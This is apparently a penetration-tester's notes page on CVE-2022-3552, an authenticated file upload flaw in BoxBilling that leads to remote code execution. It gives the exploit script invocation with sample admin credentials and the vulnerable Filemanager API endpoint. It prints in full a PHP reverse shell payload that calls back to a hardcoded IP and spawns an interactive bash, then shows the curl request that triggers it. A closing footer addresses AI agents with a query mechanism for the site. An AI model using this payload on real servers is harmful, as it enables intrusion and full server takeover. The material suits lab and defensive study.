# BoxBilling

[BoxBilling](https://docs.boxbilling.com/en/latest/index.html) is an open-source web application designed to facilitate automated client management, billing, and support services. Although primarily aimed at web hosting companies, it functions similarly to a lightweight CMS by offering modules for account handling, invoicing, and service provisioning through a web interface. The platform is **PHP-based**, supports integration with various payment gateways, and exposes multiple web-accessible endpoints, some of which interact directly with backend logic and server resources.

## Authenticated File Upload (RCE)

BoxBilling versions up to and including `4.22.1.5` that allows **authenticated administrators** to **upload files without proper validation**, including dangerous file types like PHP shells. The flaw resides in a hidden API endpoint that fails to restrict file type or enforce adequate sanitization . Once a payload is uploaded, execution occurs on the server side, **resulting in RCE with web‑server privileges**. A working is available (needs changing the hardcoded socket details in the revshell payload).

BoxBilling versions up to and including `4.22.1.5` are affected by an **authenticated file upload** vulnerability ([CVE-2022-3552](https://nvd.nist.gov/vuln/detail/CVE-2022-3552)) that **allows administrative users to upload arbitrary files** without any validation or restriction on file type. The vulnerability exists within the `Filemanager` API, which fails to enforce input sanitization or MIME filtering when writing data to disk. This flaw allows for the upload of malicious PHP payloads, **resulting in RCE** when the uploaded file is accessed via the web server.

A public [PoC](https://x7331.gitbook.io/notes/) is available and works with minimal modification. Socket values (IP and port) must be updated within the reverse shell payload prior to use:

{% code overflow="wrap" %}

```bash
./CVE-2022-3552.py -d http://boxbilling.com -u admin@boxbilling.com -p Passw0rd123!
```

{% endcode %}

The vulnerability can also be exploited manually via a `POST` request to the endpoint:

```
/index.php?_url=/api/admin/Filemanager/save_file
```

The `data` parameter accepts raw PHP content as a string and writes it to a file in the web root. No restrictions are enforced, making it possible to directly implant a web/reverse shell. All double quotes within the payload must be escaped (`\"`), and unnecessary whitespace should be removed to ensure proper parsing. To confirm the upload path, the following endpoint can be queried ([BoxBilling Admin API Docs](https://docs.boxbilling.com/en/latest/reference/api-admin.html#admin-filemanager-get-list)):

```
/index.php?_url=/api/admin/Filemanager/get_list
```

Example payload (reverse shell), delivered via the API as JSON:

{% code overflow="wrap" %}

```json
{
  "order_id": 1,
  "data": "<?php set_time_limit (0);$VERSION = \"1.0\";$ip = '192.168.45.170';$port = 80;$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/bash -i';$daemon = 0;$debug = 0;if (function_exists('pcntl_fork')) {$pid = pcntl_fork();if ($pid == -1) {exit(1);}if ($pid) {exit(0);}if (posix_setsid() == -1) {exit(1);}$daemon = 1;}chdir(\"/\");umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {exit(1);}$descriptorspec = array(0 => array(\"pipe\", \"r\"),1 => array(\"pipe\", \"w\"),2 => array(\"pipe\", \"w\"));$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {exit(1);}stream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);while (1) {if (feof($sock)) {break;}if (feof($pipes[1])) {break;}$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);if (in_array($sock, $read_a)) {$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) {$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);}if (in_array($pipes[2], $read_a)) {$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process); ?>",
  "path": "revshell.php"
}
```

{% endcode %}

Once successfully uploaded, the shell becomes accessible via a browser or CLI:

```bash
curl -s http://boxbilling.com/revshell.php
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://x7331.gitbook.io/boxes/tl-dr/web/applications/boxbilling.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.